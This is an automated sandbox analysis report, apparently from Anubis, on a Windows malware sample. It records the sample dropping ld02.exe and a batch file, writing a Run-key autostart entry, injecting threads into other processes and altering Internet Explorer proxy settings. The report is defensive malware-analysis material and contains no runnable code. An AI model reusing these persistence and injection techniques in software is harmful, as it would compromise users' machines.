Analysis Report for 94d1649b5bb060184e8d2550a01bb9c5

Comment on this report

Summary:

Description	Risk
Autostart capabilities: This executable registers processes to be executed at system start. This could result in unwanted actions to be performed automatically.
Changes security settings of Internet Explorer: This system alteration could seriously affect safety surfing the World Wide Web.
Creates files in the Windows system directory: Malware often keeps copies of itself in the Windows directory to stay undetected by users.
Performs File Modification and Destruction: The executable modifies and destructs files which are not temporary.
Spawns Processes: The executable produces processes during the execution.
Performs Registry Activities: The executable reads and modifies registry values. It may also create and monitor registry keys.

Table of Contents
expand all	collapse all
General information sample.exe C:\sample.exe Primary Analysis Subject General Information a) Registry Activities b) File Activities c) Process Activities ld02.exe c:\windows\ld02.exe Started by sample.exe General Information a) Registry Activities b) File Activities c) Windows Service Activities d) Process Activities e) Network Activities services.exe C:\WINDOWS\system32\services.exe NtConnectPort(\RPC Control\ntsvcs was called. General Information a) Registry Activities b) File Activities tt_1211198016.exe C:\WINDOWS\tt_1211198016.exe Started by ld02.exe General Information a) Registry Activities b) File Activities c) Process Activities cmd.exe C:\WINDOWS\system32\cmd.exe Started by tt_1211198016.exe General Information a) Registry Activities b) File Activities c) Process Activities tt_1211198016.exe C:\WINDOWS\tt_1211198016.exe Started by cmd.exe General Information a) File Activities netsh.exe netsh.exe Started by cmd.exe General Information jopaxx_1211198017.exe C:\DOCUME~1\user\LOCALS~1\Temp\jopaxx_1211198017.exe Started by ld02.exe General Information a) Registry Activities b) File Activities c) Process Activities pp03.exe c:\windows\pp03.exe Started by jopaxx_1211198017.exe General Information a) Registry Activities b) File Activities cmd.exe C:\WINDOWS\system32\cmd.exe Started by jopaxx_1211198017.exe General Information a) Registry Activities b) File Activities cmd.exe C:\WINDOWS\system32\cmd.exe Started by sample.exe General Information a) Registry Activities b) File Activities

1. General Information

	- Information about Anubis' invocation

Time needed:	242 s
Report created:	03/18/09, 21:23:21 UTC
Termination reason:	Timeout
Program version:	1.67.0

1.a) - Network Activity

	- Unknown UDP Traffic:

from ANUBIS:1025 to 192.168.0.1:53

State: Normal establishment and termination - Transferred outbound Bytes: 94 - Transferred inbound Bytes: 411

2. sample.exe

	- General information about this executable

Analysis Reason:	Primary Analysis Subject
Filename:	sample.exe
MD5:	94d1649b5bb060184e8d2550a01bb9c5
SHA-1:	7a78d993b8b560141822a4f23e5ff5d43c627bcf
File Size:	14848 Bytes
Command Line:	"C:\sample.exe"
Process-status at analysis end:	alive
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\MSVCP60.dll	0x76080000	0x00065000
C:\WINDOWS\system32\msvcrt.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\ole32.dll	0x774E0000	0x0013D000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\OLEAUT32.dll	0x77120000	0x0008B000
C:\WINDOWS\system32\SHELL32.dll	0x7C9C0000	0x00817000
C:\WINDOWS\system32\SHLWAPI.dll	0x77F60000	0x00076000
C:\WINDOWS\system32\WS2_32.dll	0x71AB0000	0x00017000
C:\WINDOWS\system32\WS2HELP.dll	0x71AA0000	0x00008000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll	0x773D0000	0x00103000
C:\WINDOWS\system32\comctl32.dll	0x5D090000	0x0009A000

	- Run-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\Apphelp.dll	0x77B40000	0x00022000

	- SigBuster Output

UPX All_Versions SN:1634

2.a) sample.exe - Registry Activities

	- Registry Keys Created Or Opened:

HKLM\System\CurrentControlSet\Control\Session Manager

	- Registry Values Modified:

Key	Name	New Value
HKLM\System\CurrentControlSet\Control\Session Manager	PendingFileRenameOperations	0x5c003f003f005c0043003a005c00730061006d0070006c0065002e006500

	- Registry Values Read:

Key	Name	Value	Times
HKLM\SYSTEM\WPA\MediaCenter	Installed	0	2
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	AuthenticodeEnabled	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	DefaultLevel	262144	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	PolicyScope	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	TransparentEnabled	1	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemData	0x5eab304f957a49896a006c1c31154015	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemSize	779	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemData	0x67b0d48b343a3fd3bce9dc646704f394	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemSize	517	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemData	0x327802dcfef8c893dc8ab006dd847d1d	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemSize	918	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemData	0xbd9a2adb42ebd8560e250e4df8162f67	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemSize	229	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemData	0x386b085f84ecf669d36b956a22c01e80	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemSize	370	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	ItemData	%HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache%OLK*	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	SaferFlags	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cache	C:\Documents and Settings\user\Local Settings\Temporary Internet Files	1

2.b) sample.exe - File Activities

	- Files Created:

c:\353454543.bat

c:\windows\ld02.exe

	- Files Read:

C:\sample.exe

	- Files Modified:

c:\353454543.bat

c:\windows\ld02.exe

	- Memory Mapped Files:

File Name

C:\WINDOWS\system32\Apphelp.dll

C:\WINDOWS\system32\cmd.exe

C:\Windows\AppPatch\sysmain.sdb

c:\353454543.bat

c:\windows\ld02.exe

2.c) sample.exe - Process Activities

	- Processes Created:

Executable	Command Line
c:\windows\ld02.exe
	c:\windows\ld02.exe
C:\WINDOWS\system32\cmd.exe
	c:\353454543.bat

	- Remote Threads Created:

Affected Process

c:\windows\ld02.exe

C:\WINDOWS\system32\cmd.exe

	- Foreign Memory Regions Read:

Process: C:\WINDOWS\system32\cmd.exe

Process: c:\windows\ld02.exe

	- Foreign Memory Regions Written:

Process: C:\WINDOWS\system32\cmd.exe

Process: c:\windows\ld02.exe

3. ld02.exe

	- General information about this executable

Analysis Reason:	Started by sample.exe
Filename:	ld02.exe
Command Line:	c:\windows\ld02.exe
Process-status at analysis end:	dead
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\MSVCP60.dll	0x76080000	0x00065000
C:\WINDOWS\system32\msvcrt.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\ole32.dll	0x774E0000	0x0013D000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\OLEAUT32.dll	0x77120000	0x0008B000
C:\WINDOWS\system32\SHELL32.dll	0x7C9C0000	0x00817000
C:\WINDOWS\system32\SHLWAPI.dll	0x77F60000	0x00076000
C:\WINDOWS\system32\WS2_32.dll	0x71AB0000	0x00017000
C:\WINDOWS\system32\WS2HELP.dll	0x71AA0000	0x00008000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll	0x773D0000	0x00103000
C:\WINDOWS\system32\comctl32.dll	0x5D090000	0x0009A000

	- Run-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\Normaliz.dll	0x008F0000	0x00009000
C:\WINDOWS\system32\iertutil.dll	0x42990000	0x00045000
C:\WINDOWS\system32\wininet.dll	0x42C10000	0x000CF000
C:\WINDOWS\system32\NETAPI32.dll	0x5B860000	0x00055000
C:\WINDOWS\system32\hnetcfg.dll	0x662B0000	0x00058000
C:\WINDOWS\System32\mswsock.dll	0x71A50000	0x0003F000
C:\WINDOWS\System32\wshtcpip.dll	0x71A90000	0x00008000
C:\WINDOWS\system32\sensapi.dll	0x722B0000	0x00005000
C:\WINDOWS\system32\MSCTF.dll	0x74720000	0x0004C000
C:\WINDOWS\system32\USERENV.dll	0x769C0000	0x000B4000
C:\WINDOWS\system32\WINMM.dll	0x76B40000	0x0002D000
C:\WINDOWS\system32\rtutils.dll	0x76E80000	0x0000E000
C:\WINDOWS\system32\rasman.dll	0x76E90000	0x00012000
C:\WINDOWS\system32\TAPI32.dll	0x76EB0000	0x0002F000
C:\WINDOWS\system32\RASAPI32.dll	0x76EE0000	0x0003C000
C:\WINDOWS\system32\DNSAPI.dll	0x76F20000	0x00027000
C:\WINDOWS\system32\WLDAP32.dll	0x76F60000	0x0002C000
C:\WINDOWS\System32\winrnr.dll	0x76FB0000	0x00008000
C:\WINDOWS\system32\rasadhlp.dll	0x76FC0000	0x00006000
C:\WINDOWS\system32\Apphelp.dll	0x77B40000	0x00022000

3.a) ld02.exe - Registry Activities

	- Registry Keys Deleted:

HKU\S-1-5-21-1229272821-1004336348-527237240-1003\AppEvents\Schemes\Apps\Explorer\Navigating\.Default

HKU\S-1-5-21-1229272821-1004336348-527237240-1003\AppEvents\Schemes\Apps\Explorer\Navigating\.Current

HKU\S-1-5-21-1229272821-1004336348-527237240-1003\AppEvents\Schemes\Apps\Explorer\Navigating

	- Registry Values Modified:

Key	Name	New Value
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	sysldtray	c:\windows\ld02.exe
HKLM\SYSTEM\CURRENTCONTROLSET\HARDWARE PROFILES\CURRENT\Software\Microsoft\windows\CurrentVersion\Internet Settings	ProxyEnable	0
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Common AppData	C:\Documents and Settings\All Users\Application Data
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Internet Explorer\Main	tp	10270
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	AppData	C:\Documents and Settings\user\Application Data
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cache	C:\Documents and Settings\user\Local Settings\Temporary Internet Files
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cookies	C:\Documents and Settings\user\Cookies
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	History	C:\Documents and Settings\user\Local Settings\History
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings	MigrateProxy	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings	ProxyEnable	0
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	SavedLegacySettings	0x460000006800000001000000000000000000000000000000040000000000

	- Registry Values Read:

Key	Name	Value	Times
HKLM\SOFTWARE\Microsoft\CTF\SystemShared\	CUAS	0	1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	UrlEncoding	0x00000000	2
HKLM\SYSTEM\CurrentControlSet\Services\Winsock\Parameters	Transports	0x5400630070006900700000004e0065007400420049004f00530000000000	2
HKLM\SYSTEM\WPA\MediaCenter	Installed	0	2
HKLM\Software\Microsoft\Tracing	EnableConsoleTracing	0	1
HKLM\Software\Microsoft\Tracing\RASAPI32	ConsoleTracingMask	4294901760	2
HKLM\Software\Microsoft\Tracing\RASAPI32	EnableConsoleTracing	0	2
HKLM\Software\Microsoft\Tracing\RASAPI32	EnableFileTracing	0	2
HKLM\Software\Microsoft\Tracing\RASAPI32	FileDirectory	%windir%\tracing	4
HKLM\Software\Microsoft\Tracing\RASAPI32	FileTracingMask	4294901760	2
HKLM\Software\Microsoft\Tracing\RASAPI32	MaxFileSize	1048576	2
HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList	AllUsersProfile	All Users	3
HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList	DefaultUserProfile	Default User	3
HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList	ProfilesDirectory	%SystemDrive%\Documents and Settings	6
HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1229272821-1004336348-527237240-1003	ProfileImagePath	%SystemDrive%\Documents and Settings\user	3
HKLM\Software\Microsoft\Windows\CurrentVersion	CommonFilesDir	C:\Program Files\Common Files	3
HKLM\Software\Microsoft\Windows\CurrentVersion	ProgramFilesDir	C:\Program Files	3
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	Common AppData	%ALLUSERSPROFILE%\Application Data	1
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content	PerUserItem	1	1
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies	PerUserItem	1	1
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History	PerUserItem	1	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	AuthenticodeEnabled	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	DefaultLevel	262144	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	PolicyScope	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	TransparentEnabled	1	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemData	0x5eab304f957a49896a006c1c31154015	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemSize	779	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemData	0x67b0d48b343a3fd3bce9dc646704f394	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemSize	517	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemData	0x327802dcfef8c893dc8ab006dd847d1d	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemSize	918	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemData	0xbd9a2adb42ebd8560e250e4df8162f67	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemSize	229	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemData	0x386b085f84ecf669d36b956a22c01e80	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemSize	370	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	ItemData	%HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache%OLK*	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	SaferFlags	0	1
HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName	ComputerName	USER	4
HKLM\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm	wheel	1	1
HKLM\System\CurrentControlSet\Control\ProductOptions	ProductType	WinNT	1
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	ComSpec	%SystemRoot%\system32\cmd.exe	6
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	FP_NO_HOST_CHECK	NO	6
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	NUMBER_OF_PROCESSORS	1	6
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	OS	Windows_NT	6
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	PATHEXT	.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH	6
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	PROCESSOR_ARCHITECTURE	x86	6
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	PROCESSOR_IDENTIFIER	x86 Family 6 Model 3 Stepping 3, GenuineIntel	6
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	PROCESSOR_LEVEL	6	6
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	PROCESSOR_REVISION	0303	6
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	Path	%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem	6
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	TEMP	%SystemRoot%\TEMP	6
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	TMP	%SystemRoot%\TEMP	6
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	windir	%SystemRoot%	6
HKLM\System\CurrentControlSet\Services\LDAP	LdapClientIntegrity	1	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters	Domain		2
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters	Hostname	user	2
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters	UseDomainNameDevolution	1	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	HelperDllName	%SystemRoot%\System32\wshtcpip.dll	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	Mapping	0x0b0000000300000002000000010000000600000002000000010000000000	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	MaxSockaddrLength	16	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	MinSockaddrLength	16	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	UseDelayedAcceptance	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters	WinSock_Registry_Version	2.0	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	Num_Catalog_Entries	3	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	Serial_Access_Num	4	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	DisplayString	Tcpip	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	LibraryPath	%SystemRoot%\System32\mswsock.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	ProviderId	0x409d05229e7ecf11ae5a00aa00a7112b	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	SupportedNameSpace	12	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	DisplayString	NTDS	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	LibraryPath	%SystemRoot%\System32\winrnr.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	ProviderId	0xee37263b80e5cf11a55500c04fd8d4ac	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	SupportedNameSpace	32	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	DisplayString	Network Location Awareness (NLA) Namespace	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	LibraryPath	%SystemRoot%\System32\mswsock.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	ProviderId	0x3a244266a83ba64abaa52e0bd71fdd83	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	SupportedNameSpace	15	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Next_Catalog_Entry_ID	1012	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Num_Catalog_Entries	11	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Serial_Access_Num	4	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004	PackedCatalogItem	%SystemRoot%\system32\rsvpsp.d	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005	PackedCatalogItem	%SystemRoot%\system32\rsvpsp.d	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\Setup	SystemSetupInProgress	0	2
